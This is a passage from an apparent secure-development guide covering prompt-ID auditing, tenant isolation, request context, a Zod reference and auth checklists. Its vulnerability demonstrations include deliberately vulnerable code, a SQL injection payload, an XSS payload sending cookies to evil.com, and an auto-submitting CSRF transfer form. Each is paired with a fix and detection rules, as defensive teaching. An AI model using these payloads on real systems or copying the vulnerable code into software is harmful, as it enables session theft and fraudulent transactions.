        1. Key concepts
        2. Difficulty level
        3. Prerequisites
        4. Summary
        """)
        .add_instruction(f"User query: {query}")
        .add_instruction("Relevant context:")
        .add_context_texts(context_texts)
        .store_context_id("user_id", ctx.user_id)
        .store_context_id("tenant_id", ctx.tenant_id)
        .store_context_id("trace_id", ctx.trace_id)
        .build()
    )

CI/CD Integration

#!/bin/bash
# scripts/audit_prompts.sh

shopt -s globstar  # enable ** to match directories recursively

echo "Auditing prompt templates..."

# Check for IDs in prompt files
grep -rn \
    "user_id\|tenant_id\|analysis_id\|document_id\|[0-9a-f]\{8\}-[0-9a-f]\{4\}" \
    backend/app/**/prompts/ \
    --include="*.py" \
    --include="*.txt" \
    --include="*.jinja2"

if [ $? -eq 0 ]; then
    echo "❌ Found potential ID leaks in prompts!"
    exit 1
fi

echo "✅ Prompt audit passed"

Testing

class TestPromptAudit:

    def test_detects_uuid(self):
        prompt = "Analyze doc 123e4567-e89b-12d3-a456-426614174000"
        violations = audit_prompt(prompt)

        assert len(violations) == 1
        assert violations[0].severity == AuditSeverity.CRITICAL
        assert violations[0].pattern == "UUID"

    def test_detects_api_key(self):
        prompt = "Use api_key: sk-1234567890abcdef"
        violations = audit_prompt(prompt)

        assert any(v.pattern == "API_KEY" for v in violations)

    def test_warns_on_user_id_field(self):
        prompt = "For user_id please provide analysis"
        violations = audit_prompt(prompt)

        assert len(violations) == 1
        assert violations[0].severity == AuditSeverity.WARNING

    def test_safe_builder_blocks_id(self):
        with pytest.raises(PromptSecurityError):
            (
                SafePromptBuilder()
                .add_instruction("Analyze for user 123e4567-e89b-12d3-a456-426614174000")
                .build()
            )

    def test_safe_builder_sanitizes_content(self):
        prompt, _ = (
            SafePromptBuilder()
            .add_content("Doc ID: 123e4567-e89b-12d3-a456-426614174000")
            .build()
        )

        assert "123e4567" not in prompt
        assert "[ID]" in prompt

    def test_context_ids_not_in_prompt(self):
        from uuid import uuid4

        user_id = uuid4()
        prompt, context = (
            SafePromptBuilder()
            .add_instruction("Analyze this")
            .store_context_id("user_id", user_id)
            .build()
        )

        assert str(user_id) not in prompt
        assert context["user_id"] == user_id

Request Context Pattern

Purpose

The RequestContext is an immutable object created at the gateway that carries identity and tracing information through the entire request lifecycle. It flows AROUND the LLM (never in prompts) and is used for:

  1. Authorization - Who is making the request
  2. Data Filtering - Scope queries to tenant/user
  3. Attribution - Tag results with proper ownership
  4. Observability - Correlate logs and traces

Implementation

from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID
from typing import FrozenSet

@dataclass(frozen=True)  # Immutable!
class RequestContext:
    """
    System context that NEVER appears in LLM prompts.
    Created at gateway, flows through all layers.
    """

    # === Identity (WHO) ===
    user_id: UUID
    tenant_id: UUID  # For B2B multi-tenant
    session_id: str
    permissions: FrozenSet[str]

    # === Tracing (OBSERVABILITY) ===
    request_id: str  # Unique per request
    trace_id: str    # Distributed tracing
    span_id: str     # Current span

    # === Resource (WHAT) ===
    resource_id: UUID | None = None  # analysis_id, document_id, etc.
    resource_type: str | None = None

    # === Metadata (WHEN, WHERE) ===
    timestamp: datetime | None = None
    client_ip: str = ""
    user_agent: str = ""

    def __post_init__(self):
        if self.timestamp is None:
            object.__setattr__(self, 'timestamp', datetime.now(timezone.utc))

Creation at Gateway

from uuid import UUID, uuid4

from fastapi import Request, Depends, HTTPException
from jose import jwt

# generate_trace_id() / generate_span_id() are app-provided tracing helpers

async def get_request_context(request: Request) -> RequestContext:
    """FastAPI dependency that creates RequestContext from JWT"""

    # 1. Extract and verify JWT
    auth_header = request.headers.get("Authorization", "")
    if not auth_header.startswith("Bearer "):
        raise HTTPException(401, "Missing authorization")

    token = auth_header[7:]
    try:
        claims = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
    except jwt.JWTError:
        raise HTTPException(401, "Invalid token")

    # 2. Build immutable context
    return RequestContext(
        user_id=UUID(claims["sub"]),
        tenant_id=UUID(claims["tenant_id"]),
        session_id=claims["session_id"],
        permissions=frozenset(claims.get("permissions", [])),
        request_id=request.headers.get("X-Request-ID", str(uuid4())),
        trace_id=generate_trace_id(),
        span_id=generate_span_id(),
        client_ip=request.client.host,
        user_agent=request.headers.get("User-Agent", ""),
    )

Usage in Endpoints

@router.post("/api/v1/analyze")
async def create_analysis(
    request: AnalyzeRequest,
    ctx: RequestContext = Depends(get_request_context),
):
    # Context is available throughout the request
    # Pass it to services, repositories, etc.

    # Authorization uses context
    await authorize(ctx, "analysis:create", None)

    # Data access uses context for filtering
    documents = await repo.find_by_user(ctx)

    # LLM call does NOT receive context
    # (see llm-safety-patterns skill)

    # Attribution uses context
    result = await save_result(llm_output, ctx)

    return result

OrchestKit Parameters

In OrchestKit, these identifiers should be in RequestContext:

Parameter   | Type | Source           | Purpose
user_id     | UUID | JWT              | Data ownership
tenant_id   | UUID | JWT              | Multi-tenant isolation
session_id  | str  | JWT              | Session tracking
analysis_id | UUID | Generated        | Current analysis job
trace_id    | str  | Generated        | Langfuse tracing
request_id  | str  | Header/Generated | Request correlation

Why Immutable?

The context is frozen (frozen=True) to prevent:

  1. Accidental modification - Can't change user_id mid-request (see the demo after this list)
  2. Security bypass - Can't escalate permissions
  3. Thread safety - Safe to pass between async tasks
  4. Hashability - Can be used as dict key for caching
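
A minimal demo of point 1, using only the standard library: any attempt to reassign a field on a frozen dataclass raises FrozenInstanceError, so a buggy code path cannot swap identities mid-request.

import dataclasses

@dataclasses.dataclass(frozen=True)
class Ctx:
    user_id: str

ctx = Ctx(user_id="user-a")
try:
    ctx.user_id = "user-b"  # every write attempt is rejected
except dataclasses.FrozenInstanceError:
    print("mutation rejected")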

Anti-Patterns

# BAD: Mutable context
class RequestContext:
    user_id: UUID  # Can be changed!

# BAD: Context in prompt
prompt = f"User {ctx.user_id} wants to analyze..."

# BAD: Context not passed to services
result = await service.process(content)  # Missing ctx!

# BAD: Context created inside service
def process(self):
    ctx = RequestContext(...)  # Should come from gateway!

Tenant Isolation Patterns

The Golden Rule

Every database query MUST include a tenant filter. There is no "global" query.

Why This Matters

Without tenant isolation:

  • User A could see User B's documents
  • LLM could mix data from different tenants
  • A bug could expose all customers' data
  • Compliance violations (GDPR, HIPAA, SOC2)

Implementation Pattern: Tenant-Scoped Repository

from uuid import UUID
from typing import TypeVar, Generic
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession

T = TypeVar("T")

class TenantScopedRepository(Generic[T]):
    """
    Base repository that ALWAYS filters by tenant.
    Cannot be bypassed - tenant filter is mandatory.
    """

    def __init__(self, session: AsyncSession, ctx: RequestContext, model: type[T]):
        self.session = session
        self.ctx = ctx
        self.model = model

    def _base_query(self):
        """Every query starts with tenant filter"""
        return select(self.model).where(
            self.model.tenant_id == self.ctx.tenant_id
        )

    async def find_all(self, **filters) -> list[T]:
        """Find all matching records (tenant-scoped)"""
        query = self._base_query()
        for key, value in filters.items():
            query = query.where(getattr(self.model, key) == value)
        result = await self.session.execute(query)
        return result.scalars().all()

    async def find_by_id(self, id: UUID) -> T | None:
        """
        Find by ID (tenant-scoped).
        Even by-ID lookup includes tenant check!
        """
        query = self._base_query().where(self.model.id == id)
        result = await self.session.execute(query)
        return result.scalar_one_or_none()

    async def find_by_user(self) -> list[T]:
        """Find records owned by current user (tenant + user scoped)"""
        query = self._base_query().where(
            self.model.user_id == self.ctx.user_id
        )
        result = await self.session.execute(query)
        return result.scalars().all()

Vector Search with Tenant Isolation

async def semantic_search(
    query_embedding: list[float],
    ctx: RequestContext,
    limit: int = 10,
) -> list[Document]:
    """
    Semantic search with mandatory tenant isolation.
    """
    return await db.execute(
        """
        SELECT id, content, metadata,
               1 - (embedding <-> :query) as similarity
        FROM documents
        WHERE tenant_id = :tenant_id          -- ALWAYS filtered!
          AND user_id = :user_id              -- User's docs only
          AND embedding <-> :query < 0.5      -- Similarity threshold
        ORDER BY embedding <-> :query
        LIMIT :limit
        """,
        {
            "tenant_id": ctx.tenant_id,  # From context
            "user_id": ctx.user_id,       # From context
            "query": query_embedding,
            "limit": limit,
        }
    )

Full-Text Search with Tenant Isolation

async def fulltext_search(
    query: str,
    ctx: RequestContext,
    limit: int = 20,
) -> list[Analysis]:
    """
    Full-text search with mandatory tenant isolation.
    """
    return await db.execute(
        """
        SELECT id, title, url,
               ts_rank(search_vector, plainto_tsquery(:query)) as rank
        FROM analyses
        WHERE tenant_id = :tenant_id          -- ALWAYS filtered!
          AND user_id = :user_id              -- User's analyses only
          AND status = 'complete'
          AND search_vector @@ plainto_tsquery(:query)
        ORDER BY rank DESC
        LIMIT :limit
        """,
        {
            "tenant_id": ctx.tenant_id,
            "user_id": ctx.user_id,
            "query": query,
            "limit": limit,
        }
    )

Caching with Tenant Isolation

def cache_key(ctx: RequestContext, operation: str, *args) -> str:
    """
    Cache keys MUST include tenant_id to prevent cross-tenant leakage.
    """
    return f"{ctx.tenant_id}:{ctx.user_id}:{operation}:{':'.join(str(a) for a in args)}"

# Usage
key = cache_key(ctx, "analysis", analysis_id)
# Result: "tenant_abc:user_123:analysis:analysis_456"

Testing Tenant Isolation

import pytest
from uuid import uuid4

class TestTenantIsolation:
    """Every repository MUST have these tests"""

    @pytest.fixture
    def tenant_a_ctx(self):
        return RequestContext(
            user_id=uuid4(),
            tenant_id=uuid4(),  # Tenant A
            ...
        )

    @pytest.fixture
    def tenant_b_ctx(self):
        return RequestContext(
            user_id=uuid4(),
            tenant_id=uuid4(),  # Tenant B (different!)
            ...
        )

    async def test_tenant_a_cannot_see_tenant_b_documents(
        self,
        tenant_a_ctx,
        tenant_b_ctx,
        db_session,
    ):
        # Create document for Tenant B
        doc = Document(
            id=uuid4(),
            tenant_id=tenant_b_ctx.tenant_id,
            content="Secret data",
        )
        db_session.add(doc)
        await db_session.commit()

        # Tenant A tries to access
        repo = TenantScopedRepository(db_session, tenant_a_ctx, Document)
        result = await repo.find_by_id(doc.id)

        # MUST be None - tenant A cannot see tenant B's data
        assert result is None

    async def test_tenant_a_cannot_search_tenant_b_documents(
        self,
        tenant_a_ctx,
        tenant_b_ctx,
    ):
        # Create and embed document for Tenant B
        await create_document(
            tenant_id=tenant_b_ctx.tenant_id,
            content="Machine learning tutorial",
        )

        # Tenant A searches for "machine learning"
        results = await semantic_search(
            query_embedding=embed("machine learning"),
            ctx=tenant_a_ctx,
        )

        # MUST be empty - tenant A cannot find tenant B's data
        assert len(results) == 0

Common Mistakes

# BAD: Global query without tenant filter
async def find_all():
    return await db.execute("SELECT * FROM documents")

# BAD: Tenant filter as optional parameter
async def find(tenant_id: UUID | None = None):
    query = "SELECT * FROM documents"
    if tenant_id:  # Can be bypassed!
        query += f" WHERE tenant_id = '{tenant_id}'"

# BAD: Trusting client-provided tenant_id
async def find(request: Request):
    tenant_id = request.query_params["tenant_id"]  # User controls this!
    return await db.find(tenant_id=tenant_id)

# GOOD: Tenant from authenticated context only
async def find(ctx: RequestContext):
    return await db.find(tenant_id=ctx.tenant_id)  # From JWT

Row-Level Security (PostgreSQL)

For additional protection, use PostgreSQL RLS:

-- Enable RLS on table
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;

-- Create policy
CREATE POLICY tenant_isolation ON documents
    USING (tenant_id = current_setting('app.tenant_id')::uuid);

-- Set tenant before queries
SET app.tenant_id = 'tenant-uuid-here';

This provides database-level enforcement even if application code has bugs.
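
A sketch of wiring the setting into the application layer, assuming SQLAlchemy async sessions (the helper name is illustrative). set_config(..., true) is transaction-local, which matters with connection pooling:

from sqlalchemy import text
from sqlalchemy.ext.asyncio import AsyncSession

async def apply_tenant_setting(session: AsyncSession, ctx: RequestContext) -> None:
    # Transaction-local: a pooled connection cannot leak the value
    # into the next request. RLS policies read it via current_setting().
    await session.execute(
        text("SELECT set_config('app.tenant_id', :tid, true)"),
        {"tid": str(ctx.tenant_id)},
    )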

Vulnerability Demonstrations

Interactive examples showing how common vulnerabilities work and how to fix them.


SQL Injection

Vulnerable Code

# DO NOT USE - Example only
from fastapi import FastAPI, Query
import sqlite3

app = FastAPI()

@app.get("/users/search")
def search_users(username: str = Query(...)):
    conn = sqlite3.connect("app.db")
    cursor = conn.cursor()

    # VULNERABLE: User input directly in query
    query = f"SELECT * FROM users WHERE username = '{username}'"
    cursor.execute(query)

    return cursor.fetchall()

# Attack payload: username = "' OR '1'='1' --"
# Resulting query: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# This returns ALL users in the database

Secure Code

# Safe implementation using parameterized queries
from fastapi import FastAPI, Query
import sqlite3

app = FastAPI()

@app.get("/users/search")
def search_users(username: str = Query(..., min_length=1, max_length=50)):
    conn = sqlite3.connect("app.db")
    cursor = conn.cursor()

    # SAFE: Parameterized query - input is escaped by the driver
    cursor.execute("SELECT * FROM users WHERE username = ?", (username,))

    return cursor.fetchall()

# With SQLAlchemy ORM (preferred)
from sqlalchemy.orm import Session
from models import User

def search_users_orm(db: Session, username: str):
    # SAFE: ORM handles parameterization
    return db.query(User).filter(User.username == username).first()

Detection

  • Pattern to find: f"SELECT, f"INSERT, f"UPDATE, f"DELETE, + "SELECT
  • Bandit rule: B608 (hardcoded_sql_expressions)
  • Semgrep rule: python.lang.security.audit.formatted-sql-query
# Detect with Bandit
bandit -r . -t B608

# Detect with Semgrep
semgrep --config "p/sql-injection" .

# Grep for f-string SQL
grep -rn "f\"SELECT\|f\"INSERT\|f\"UPDATE\|f\"DELETE" --include="*.py" .

Cross-Site Scripting (XSS)

Vulnerable Code

// DO NOT USE - Example only

// Reflected XSS - Dangerous innerHTML
function displayMessage() {
    const urlParams = new URLSearchParams(window.location.search);
    const message = urlParams.get('message');

    // VULNERABLE: User input directly inserted as HTML
    document.getElementById('output').innerHTML = message;
}

// Attack payload: ?message=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
// This executes JavaScript that steals cookies
# DO NOT USE - Server-side XSS (Flask)
from flask import Flask, request

app = Flask(__name__)

@app.route('/greet')
def greet():
    name = request.args.get('name', '')

    # VULNERABLE: User input in HTML response
    return f"<h1>Hello, {name}!</h1>"

# Attack: /greet?name=<script>alert('XSS')</script>

Secure Code

// Safe implementation using textContent
function displayMessage() {
    const urlParams = new URLSearchParams(window.location.search);
    const message = urlParams.get('message');

    // SAFE: textContent escapes HTML entities
    document.getElementById('output').textContent = message;
}

// If HTML is required, use DOMPurify
import DOMPurify from 'dompurify';

function displayRichMessage() {
    const urlParams = new URLSearchParams(window.location.search);
    const message = urlParams.get('message');

    // SAFE: DOMPurify removes malicious content
    document.getElementById('output').innerHTML = DOMPurify.sanitize(message);
}
# Safe implementation using template escaping
from flask import Flask, request, render_template_string
from markupsafe import escape

app = Flask(__name__)

@app.route('/greet')
def greet():
    name = request.args.get('name', '')

    # SAFE: escape() converts <script> to &lt;script&gt;
    return f"<h1>Hello, {escape(name)}!</h1>"

# Or use Jinja2 templates (auto-escape by default)
@app.route('/greet-template')
def greet_template():
    return render_template_string(
        "<h1>Hello, {{ name }}!</h1>",  # Auto-escaped
        name=request.args.get('name', '')
    )

Detection

  • Pattern to find: .innerHTML =, dangerouslySetInnerHTML, v-html=
  • ESLint rule: no-unsanitized/property
  • Semgrep rule: javascript.browser.security.insecure-document-method
# Detect with Semgrep
semgrep --config "p/xss" .

# Grep for innerHTML
grep -rn "\.innerHTML\s*=" --include="*.js" --include="*.jsx" --include="*.ts" --include="*.tsx" .

# React dangerouslySetInnerHTML
grep -rn "dangerouslySetInnerHTML" --include="*.jsx" --include="*.tsx" .

Cross-Site Request Forgery (CSRF)

Vulnerable Code

# DO NOT USE - Example only
from fastapi import FastAPI, Form

app = FastAPI()

@app.post("/transfer")
async def transfer_money(
    to_account: str = Form(...),
    amount: float = Form(...)
):
    # VULNERABLE: No CSRF protection
    # Attacker can create a form on evil.com that submits to this endpoint
    # When victim visits evil.com while logged in, their session cookie is sent
    perform_transfer(to_account, amount)
    return {"status": "success"}
<!-- Attacker's page on evil.com -->
<!-- DO NOT USE - Attack example only -->
<html>
<body onload="document.forms[0].submit()">
  <form action="https://bank.com/transfer" method="POST">
    <input type="hidden" name="to_account" value="ATTACKER123" />
    <input type="hidden" name="amount" value="10000" />
  </form>
</body>
</html>

Secure Code

# Safe implementation with CSRF tokens
from fastapi import FastAPI, Form, Depends, HTTPException, Request
from fastapi.responses import HTMLResponse
import secrets
from starlette.middleware.sessions import SessionMiddleware

app = FastAPI()
app.add_middleware(SessionMiddleware, secret_key="your-secret-key")

def get_csrf_token(request: Request) -> str:
    if "csrf_token" not in request.session:
        request.session["csrf_token"] = secrets.token_urlsafe(32)
    return request.session["csrf_token"]

def verify_csrf_token(request: Request, csrf_token: str = Form(...)):
    expected = request.session.get("csrf_token", "")
    # Constant-time comparison avoids leaking token bytes via timing
    if not secrets.compare_digest(expected, csrf_token):
        raise HTTPException(status_code=403, detail="CSRF token mismatch")

@app.get("/transfer-form")
async def transfer_form(request: Request):
    token = get_csrf_token(request)
    return HTMLResponse(f"""
        <form method="POST" action="/transfer">
            <input type="hidden" name="csrf_token" value="{token}" />
            <input name="to_account" placeholder="Account" />
            <input name="amount" type="number" placeholder="Amount" />
            <button type="submit">Transfer</button>
        </form>
    """)

@app.post("/transfer")
async def transfer_money(
    request: Request,
    to_account: str = Form(...),
    amount: float = Form(...),
    _: None = Depends(verify_csrf_token)  # CSRF check
):
    # SAFE: Request will fail without valid CSRF token
    perform_transfer(to_account, amount)
    return {"status": "success"}
# Alternative: SameSite cookies (modern approach)
from fastapi import Response

@app.post("/login")
async def login(response: Response, username: str, password: str):
    # Authenticate user and create session_token...

    # SAFE: SameSite=Strict prevents cross-origin cookie sending
    response.set_cookie(
        key="session_id",
        value=session_token,
        httponly=True,
        secure=True,
        samesite="strict"  # Key protection
    )
    return {"status": "logged_in"}

Detection

  • Check for: Missing CSRF tokens in forms, cookies without SameSite
  • Semgrep rule: python.django.security.audit.csrf-exempt
# Check cookie settings
grep -rn "set_cookie\|setCookie" --include="*.py" --include="*.js" . | grep -v "samesite"

# Django CSRF exempt decorators
grep -rn "@csrf_exempt" --include="*.py" .

# Check forms without CSRF tokens
grep -rn "<form" --include="*.html" . | grep -v "csrf"

Authentication Bypass

Vulnerable Code

# DO NOT USE - Example only
from fastapi import FastAPI, Header
import jwt

app = FastAPI()
SECRET_KEY = "mysecret"

@app.get("/admin")
async def admin_panel(authorization: str = Header(...)):
    token = authorization.replace("Bearer ", "")

    # VULNERABLE: Algorithm read from token header (algorithm confusion attack)
    header = jwt.get_unverified_header(token)
    payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])

    # Attacker can set alg="none" or use public key as HMAC secret
    if payload.get("role") == "admin":
        return {"admin_data": "sensitive"}
    return {"error": "Not admin"}
# DO NOT USE - Password comparison vulnerable to timing attack
import hmac

def check_password(stored_hash: str, provided_hash: str) -> bool:
    # VULNERABLE: Early exit reveals password length
    if len(stored_hash) != len(provided_hash):
        return False

    # VULNERABLE: Character-by-character comparison
    for a, b in zip(stored_hash, provided_hash):
        if a != b:
            return False
    return True

Secure Code

# Safe implementation with hardcoded algorithm
from fastapi import FastAPI, Header, HTTPException, Depends
import jwt
from datetime import datetime, timedelta

app = FastAPI()
SECRET_KEY = "your-256-bit-secret"
ALGORITHM = "HS256"

def verify_token(authorization: str = Header(...)):
    try:
        token = authorization.replace("Bearer ", "")

        # SAFE: Algorithm is hardcoded, not read from token
        payload = jwt.decode(
            token,
            SECRET_KEY,
            algorithms=[ALGORITHM],  # Fixed algorithm
            options={
                "require": ["exp", "iat", "sub"],  # Required claims
            }
        )

        return payload
    except jwt.ExpiredSignatureError:
        raise HTTPException(401, "Token expired")
    except jwt.InvalidTokenError:
        raise HTTPException(401, "Invalid token")

@app.get("/admin")
async def admin_panel(payload: dict = Depends(verify_token)):
    if payload.get("role") != "admin":
        raise HTTPException(403, "Admin access required")
    return {"admin_data": "sensitive"}
# Safe password comparison using constant-time comparison
import hmac
import hashlib

def check_password_secure(stored_hash: str, provided_password: str) -> bool:
    # Hash the provided password
    provided_hash = hashlib.sha256(provided_password.encode()).hexdigest()

    # SAFE: hmac.compare_digest uses constant-time comparison
    return hmac.compare_digest(stored_hash, provided_hash)

# Better: Use a proper password hashing library
from passlib.hash import argon2

def verify_password(plain_password: str, hashed_password: str) -> bool:
    # SAFE: Argon2 handles timing-safe comparison internally
    return argon2.verify(plain_password, hashed_password)

Detection

  • JWT patterns: jwt.get_unverified_header, algorithms= with variable
  • Password patterns: Manual string comparison, missing hmac.compare_digest
# JWT algorithm confusion
grep -rn "get_unverified_header\|algorithms=\[" --include="*.py" .

# Timing attack vulnerable comparisons
semgrep --config "p/python-security-audit" .

# Check for weak password hashing
grep -rn "md5\|sha1\|sha256" --include="*.py" . | grep -i password

Summary Table

Vulnerability | Bandit ID | Semgrep Config    | Quick Fix
SQL Injection | B608      | p/sql-injection   | Parameterized queries
XSS           | N/A       | p/xss             | textContent, escape()
CSRF          | N/A       | p/django          | SameSite cookies, tokens
JWT Algorithm | B105      | p/jwt             | Hardcode algorithm
Timing Attack | B303      | p/python-security | hmac.compare_digest

Related Skills

  • input-validation - Sanitization patterns
  • auth-patterns - Authentication implementation
  • security-scanning - Automated detection

Zod v4 API Reference

Installation

npm install zod@latest

Basic Types

import { z } from 'zod';

// Primitives
const stringSchema = z.string();
const numberSchema = z.number();
const booleanSchema = z.boolean();
const dateSchema = z.date();
const bigintSchema = z.bigint();

// String validations
z.string().min(1)           // Non-empty
z.string().max(100)         // Max length
z.string().email()          // Email format
z.string().url()            // URL format
z.string().uuid()           // UUID format
z.string().regex(/pattern/) // Custom pattern
z.string().trim()           // Trim whitespace
z.string().toLowerCase()    // Lowercase

// Number validations
z.number().int()            // Integer only
z.number().positive()       // > 0
z.number().nonnegative()    // >= 0
z.number().min(0)           // >= 0
z.number().max(100)         // <= 100
z.number().finite()         // Not Infinity

Type Coercion (v4 Feature)

Automatically coerce input to desired type:

// Coerce to string
const stringSchema = z.coerce.string();
stringSchema.parse(123);        // "123"
stringSchema.parse(true);       // "true"

// Coerce to number
const numberSchema = z.coerce.number();
numberSchema.parse("123");      // 123
numberSchema.parse("3.14");     // 3.14

// Coerce to boolean
const booleanSchema = z.coerce.boolean();
booleanSchema.parse("true");    // true
booleanSchema.parse("1");       // true
booleanSchema.parse("");        // false

// Coerce to date
const dateSchema = z.coerce.date();
dateSchema.parse("2024-01-01"); // Date object
dateSchema.parse(1704067200000); // Date object

// Coerce to bigint
const bigintSchema = z.coerce.bigint();
bigintSchema.parse("9007199254740991"); // BigInt

Objects

const UserSchema = z.object({
  id: z.string().uuid(),
  email: z.string().email(),
  name: z.string().min(2).max(100),
  age: z.number().int().positive().optional(),
  role: z.enum(['user', 'admin', 'moderator']),
  createdAt: z.coerce.date(),
});

// Infer TypeScript type
type User = z.infer<typeof UserSchema>;

// Parse and validate
const user = UserSchema.parse(data);

// Safe parse (no throw)
const result = UserSchema.safeParse(data);
if (result.success) {
  console.log(result.data);
} else {
  console.log(result.error.errors);
}

Discriminated Unions

More efficient than regular unions:

const ShapeSchema = z.discriminatedUnion('type', [
  z.object({
    type: z.literal('circle'),
    radius: z.number().positive(),
  }),
  z.object({
    type: z.literal('rectangle'),
    width: z.number().positive(),
    height: z.number().positive(),
  }),
  z.object({
    type: z.literal('triangle'),
    base: z.number().positive(),
    height: z.number().positive(),
  }),
]);

type Shape = z.infer<typeof ShapeSchema>;

// Usage
const circle = ShapeSchema.parse({ type: 'circle', radius: 5 });

Transforms

Transform data during validation:

// Transform to uppercase
const uppercaseSchema = z.string().transform(s => s.toUpperCase());
uppercaseSchema.parse("hello"); // "HELLO"

// Compute derived field
const UserInputSchema = z.object({
  firstName: z.string(),
  lastName: z.string(),
}).transform(data => ({
  ...data,
  fullName: `${data.firstName} ${data.lastName}`,
}));

// Parse string to object
const jsonSchema = z.string().transform((str, ctx) => {
  try {
    return JSON.parse(str);
  } catch {
    ctx.addIssue({
      code: z.ZodIssueCode.custom,
      message: "Invalid JSON",
    });
    return z.NEVER;
  }
});

Refinements

Custom validation logic:

// Simple refinement
const passwordSchema = z.string()
  .min(8)
  .refine(
    (val) => /[A-Z]/.test(val),
    { message: "Must contain uppercase letter" }
  )
  .refine(
    (val) => /[0-9]/.test(val),
    { message: "Must contain number" }
  );

// Super refinement (multiple issues)
const formSchema = z.object({
  password: z.string().min(8),
  confirmPassword: z.string(),
}).superRefine((data, ctx) => {
  if (data.password !== data.confirmPassword) {
    ctx.addIssue({
      code: z.ZodIssueCode.custom,
      message: "Passwords don't match",
      path: ["confirmPassword"],
    });
  }
});

Async Refinements

For async validation (e.g., database checks):

const usernameSchema = z.string()
  .min(3)
  .refine(
    async (username) => {
      const exists = await checkUsernameExists(username);
      return !exists;
    },
    { message: "Username already taken" }
  );

// Must use parseAsync
const result = await usernameSchema.parseAsync("newuser");

Error Handling

import { z, ZodError } from 'zod';

try {
  UserSchema.parse(invalidData);
} catch (error) {
  if (error instanceof ZodError) {
    // Formatted errors
    console.log(error.format());
    
    // Flat errors
    console.log(error.flatten());
    
    // Issues array
    error.issues.forEach(issue => {
      console.log(issue.path, issue.message);
    });
  }
}

// Custom error map
const customErrorMap: z.ZodErrorMap = (issue, ctx) => {
  if (issue.code === z.ZodIssueCode.invalid_type) {
    return { message: `Expected ${issue.expected}, received ${issue.received}` };
  }
  return { message: ctx.defaultError };
};

z.setErrorMap(customErrorMap);

React Hook Form Integration

import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';

const FormSchema = z.object({
  email: z.string().email(),
  password: z.string().min(8),
});

type FormData = z.infer<typeof FormSchema>;

function MyForm() {
  const { register, handleSubmit, formState: { errors } } = useForm<FormData>({
    resolver: zodResolver(FormSchema),
  });

  const onSubmit = (data: FormData) => {
    console.log(data);
  };

  return (
    <form onSubmit={handleSubmit(onSubmit)}>
      <input {...register('email')} />
      {errors.email && <span>{errors.email.message}</span>}
      
      <input type="password" {...register('password')} />
      {errors.password && <span>{errors.password.message}</span>}
      
      <button type="submit">Submit</button>
    </form>
  );
}

Pydantic Comparison (Python)

from pydantic import BaseModel, EmailStr, Field, field_validator

class User(BaseModel):
    email: EmailStr
    name: str = Field(min_length=2, max_length=100)
    age: int = Field(ge=0, le=150)
    
    @field_validator('name')
    @classmethod
    def name_must_be_title_case(cls, v: str) -> str:
        return v.title()

# Usage
user = User(email="test@example.com", name="john doe", age=25)
print(user.name)  # "John Doe"

Checklists (5)

Authentication Security Checklist

Password Security

  • Use Argon2id (preferred) or bcrypt for hashing
  • Minimum 12 character password requirement
  • Check against common password lists
  • No password hints or security questions
  • Rate limit password attempts (5 per minute)
  • Account lockout after 10 failed attempts

Token Security

  • Access tokens: 15 min - 1 hour lifetime
  • Refresh tokens: 7-30 days with rotation
  • Store access tokens in memory only (not localStorage)
  • Store refresh tokens in HTTPOnly cookies
  • Implement refresh token rotation (see the sketch after this list)
  • Revoke all tokens on password change
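
A minimal rotation sketch (illustrative names; a dict stands in for your token table). Each refresh token is single-use, and presenting an already-used token is treated as a theft signal:

import hashlib
import secrets

def rotate_refresh_token(store: dict, presented: str) -> str:
    key = hashlib.sha256(presented.encode()).hexdigest()
    record = store.get(key)
    if record is None or record["used"]:
        # Replay of a rotated token => assume theft; reject and
        # revoke the user's other sessions out of band.
        raise PermissionError("refresh token reuse detected")
    record["used"] = True  # the old token can never be replayed
    new_token = secrets.token_urlsafe(32)
    store[hashlib.sha256(new_token.encode()).hexdigest()] = {"used": False}
    return new_token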

Session Security

  • SESSION_COOKIE_SECURE=True (HTTPS only)
  • SESSION_COOKIE_HTTPONLY=True (no JS access)
  • SESSION_COOKIE_SAMESITE='Strict'
  • Session timeout (1 hour inactivity)
  • Regenerate session ID on login

OAuth 2.1 Compliance

  • Use PKCE for ALL clients (see the PKCE sketch after this list)
  • No implicit grant
  • No password grant
  • State parameter for CSRF protection
  • Validate redirect_uri exactly
  • Use HTTPS for all endpoints
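
For reference, the S256 code_verifier/code_challenge pair from RFC 7636 can be generated with the standard library alone (a sketch; the function name is illustrative):

import base64
import hashlib
import secrets

def make_pkce_pair() -> tuple[str, str]:
    verifier = base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()
    challenge = base64.urlsafe_b64encode(
        hashlib.sha256(verifier.encode("ascii")).digest()
    ).rstrip(b"=").decode()
    # Send challenge (method S256) to /authorize; present verifier at /token
    return verifier, challenge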

Passkeys/WebAuthn (If Implemented)

  • Require user verification (biometric)
  • Require resident keys for passwordless
  • Validate RP ID matches origin
  • Track sign count for replay protection
  • Allow multiple passkeys per user

Multi-Factor Authentication

  • Offer MFA (TOTP, Passkeys)
  • TOTP: 6 digits, 30-second window
  • Backup codes (10 one-time use; see the sketch after this list)
  • Remember device option (30 days max)
  • Require MFA for sensitive operations
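
Backup codes are simple to generate; the key requirement is storing only their hashes, exactly as you would passwords (a minimal sketch):

import hashlib
import secrets

def generate_backup_codes(n: int = 10) -> tuple[list[str], list[str]]:
    codes = [secrets.token_hex(4) for _ in range(n)]  # shown to the user once
    hashes = [hashlib.sha256(c.encode()).hexdigest() for c in codes]  # persisted
    return codes, hashes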

Rate Limiting

Endpoint       | Limit
Login          | 5 per minute
Password reset | 3 per hour
MFA verify     | 5 per minute
Registration   | 10 per hour
API general    | 100 per minute

Error Messages

  • Generic "Invalid credentials" (don't reveal which is wrong)
  • Don't reveal if email exists in forgot password
  • Log detailed errors server-side only
  • No stack traces in production

Secure Headers

response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
response.headers['X-Content-Type-Options'] = 'nosniff'
response.headers['X-Frame-Options'] = 'DENY'
response.headers['Content-Security-Policy'] = "default-src 'self'"

Audit Logging

  • Log all authentication attempts (see the sketch after this list)
  • Log password changes
  • Log MFA setup/disable
  • Log token revocations
